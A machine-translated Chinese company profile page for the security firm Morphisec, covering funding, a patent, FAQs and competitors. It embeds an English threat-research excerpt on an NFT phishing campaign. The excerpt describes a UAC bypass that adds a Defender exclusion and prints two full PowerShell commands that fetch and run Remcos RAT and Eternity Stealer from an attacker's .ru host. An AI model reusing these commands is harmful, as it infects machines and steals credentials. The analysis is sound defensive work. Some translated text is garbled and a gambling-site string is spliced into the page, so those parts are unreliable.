Morphisec
成立一年
2014階段
C係列 |活著總了
50美元最後提出了
31美元 2年前馬賽克的分數
“馬賽克分數”是衡量民間企業整體財務健康狀況和市場潛力的算法。
過去30天上漲20點
與Morphisec?
確保您的公司和產品在我們的平台上被準確地展示。
Morphisec的產品和差異化
警衛
Windows移動目標防禦(MTD)端點安全解決方案
包含Morphisec的專家集合
專家集合是由分析師策劃的列表,突出了您需要了解的最重要的技術領域的公司。
Morphisec包含在3專家收藏,包括會議參展商.
會議參展商
5302件
網絡安全
5097件
先進製造
3787件
公司專注於提高製造業生產率的技術,從自動化和機器人到AR/VR,再到工廠分析和人工智能,等等。
Morphisec專利
Morphisec已申請1項專利。
最受歡迎的3個專利主題包括:
- 計算機安全
- 電腦保安漏洞
- 計算機網絡安全
申請日 |
授予日期 |
標題 |
相關的話題 |
狀態 |
---|---|---|---|---|
12/28/2017 |
11/9/2021 |
編程範例,計算機安全漏洞,計算機網絡安全,注入漏洞,計算機安全 |
格蘭特 |
申請日 |
12/28/2017 |
---|---|
授予日期 |
11/9/2021 |
標題 |
|
相關的話題 |
編程範例,計算機安全漏洞,計算機網絡安全,注入漏洞,計算機安全 |
狀態 |
格蘭特 |
最新的Morphisec新聞
2022年9月23日
惡意軟件的傳輸方式沒有太大變化。它向用戶發送一條私人消息,引誘他們下載一個相關的應用程序,據稱該應用程序授予用戶使用最新功能的權限。下麵是針對“Dune”(基於以太坊的加密數據分析平台)用戶的釣魚消息示例。如果用戶點擊消息中的超鏈接,它會將他引導到一個模仿原始網站的誘餌網站。在那裏,用戶會被提示下載惡意的“安裝程序”,它會用Remcos RAT感染受害者的機器。有關基礎設施的更多信息,請閱讀Morphisec之前提到的白皮書“Crypto Scammer之旅”。威脅行為者保持第一階段“安裝程序”的低檢出率。執行從執行用戶帳戶控製(UAC)繞過開始。它劫持了ms-settings協議的默認處理程序,並設置它執行一個Powershell命令,將C:\文件夾添加到Windows Defender排除列表中。執行這種UAC繞過技術的代碼在開源存儲庫中有很好的文檔記錄。 But the attacker employed it extremely poorly—he didn't even bother to remove unnecessary WinAPI calls, such as printing to the console. After excluding the C:\ folder from Windows Defender, the following Powershell commands are de-obfuscated and executed: 1) The first Powershell command downloads and executes a plain Remcos RAT (C2 - 144.91.79[.]86). powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://rwwmefkauiaa[. ]ru/bs8bo90akv.exe -OutFile \"$env:appdata/Microsoft/dllservice.exe\"; Start-Process -Filepath \"$env:appdata/Microsoft/dllservice.exe\" The C2 used in that Remcos RAT was also seen in the wild in samples using the Babadeda crypter. This bolsters our suspicion it's the same threat actor. 2) The second Powershell command downloads and executes Eternity Stealer which steals sensitive information from a victim’s machine such as: Browser information like login credentials, history, cookies VPN and FTP client data Messaging software data Password management software data powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = 'SilentlyContinue'; mkdir \"$env:appdata/Microsoft/AddIns\"; Invoke-WebRequest http://rwwmefkauiaa[. ]ru/u84ls.exe -OutFile \"$env:appdata/Microsoft/AddIns/exclusions.exe\"; Start-Process -Filepath \"$env:appdata/Microsoft/AddIns/exclusions.exe\" We also noticed a variant of this downloader in the Tandem Espionage campaign shares commonalities with this campaign: There is a similar UAC bypass technique using fodhelper.exe (less evasive implementation) Downloading and executing two malicious executables (Arkei stealer and Eternity stealer) The Eternity stealer is downloaded by the exact same Powershell command as the second Powershell command from the same URL Though the URL downloading the Eternity stealer is the same, we think these may be two different threat actors that used the same downloader as a service. Defending Against NFT Malware Like NFT-001 The crypto and NFT communities are on the cutting edge of financial innovation, and they are a lucrative target for attackers. This naturally means there’s more scope for threat actors to exploit gaps in such rapidly evolving technology. This new staged downloader for NFT-001 is more evasive than the earlier version, increasing its ability to sneak past traditional cybersecurity solutions. According to the latest Picus report, defense evasion is now the most popular tactic among malware operators. This tactic is popular because there aren’t many effective tools against defense evasion. One such tool is Morphisec’s revolutionary Moving Target Defense (MTD) technology, which comprehensively prevents defense evasion techniques. Unlike other cybersecurity solutions which focus on detecting known patterns with response playbooks, MTD preemptively blocks attacks on memory and applications and remediates the need for a response. To learn more about Morphisec’s revolutionary Moving Target Defense technology, read the white paper: Zero Trust + Moving Target Defense: The Ultimate Ransomware Strategy . IOCs
Morphisec網絡流量
Morphisec排名
Morphisec常見問題(FAQ)
Morphisec是什麼時候成立的?
Morphisec成立於2014年。
Morphisec的總部在哪裏?
Morphisec總部位於波士頓Beacon St 11號。
Morphisec的最新一輪融資是什麼?
Morphisec的最新一輪融資是C輪。
Morphisec籌到了多少錢?
Morphisec總共籌集了5000萬美元。
誰是Morphisec的投資者?
Morphisec的投資者包括Jerusalem Venture Partners、DTCP、Orange Digital Ventures、GE Ventures、OurCrowd等6家公司。
誰是Morphisec的競爭對手?
Morphisec的競爭對手包括Tanium、Deep Instinct、Microsoft、McAfee、Sysdig等16家公司。
Morphisec提供什麼產品?
Morphisec的產品包括Guard和其他4個。
誰是Morphisec的客戶?
Morphisec的客戶包括Altra Industrial Motion, Citizens Medical Center, Houston Eye Associates和Kentucky Trailer。
將Morphisec與競爭對手進行比較
Automox提供了一種基於雲的端點管理解決方案,旨在完全自動化來自單一平台的Windows、OS X和Linux端點的補丁、配置和維護。端點管理對於IT組織來說是一個巨大的問題,由於不同的操作係統、軟件、設備類型和地理位置而變得複雜。Automox的動態策略引擎(Dynamic Policy Engine)允許IT經理定製和分組策略,以確保每個端點(無論位於何處)都滿足法規和安全需求。
McAfee是一家安全技術公司,總部位於加利福尼亞州的聖克拉拉,提供主動的、經過驗證的解決方案和服務,確保係統和網絡的安全。2022年3月1日,McAfee被Advent International牽頭的一個投資者集團以140億美元的估值收購。
Deep Instinct將被稱為深度學習的人工智能(AI)的一個子集應用於網絡安全。該公司已經建立了一個龐大的神經網絡,通過數億個文件進行訓練。識別和防止網絡攻擊與人類無關。結果,99%的時間檢測到威脅,假陽性率<0.1%。該公司為商務客戶服務。該公司成立於2015年,總部位於紐約。
Tanium使企業和政府組織能夠在幾秒鍾內保護、控製和管理整個企業的數百萬個端點。Tanium充當企業的“中樞神經係統”,它使安全和IT運營團隊能夠詢問關於整個企業端點狀態的問題,檢索關於它們當前和曆史狀態的數據,並在必要時執行更改。該公司成立於2007年,總部位於華盛頓州的柯克蘭。
Cybereason開發的軟件旨在更好地追蹤潛在網絡攻擊者的行為。Cybereason自動化平台通過學習識別異常並區分良性和惡性來收集微妙的線索。然後使用大數據算法和帶有外部智能的專有知識對這些數據進行分析。
Source Defense是一種實時SAAS解決方案,保護在線網站免受來自第三方腳本的攻擊。它使用實時沙盒隔離技術提供客戶端網站安全解決方案,重點防止來自網站供應鏈供應商的惡意活動。該公司成立於2014年,總部位於以色列的羅什哈因。
為你的團隊找到正確的解決方案
CB I188bet游戏nsights技術市場情報平台分析供應商、產品、合作夥伴和專利的數百萬個數據點,幫助您的團隊找到他們的下一個技術解決方案。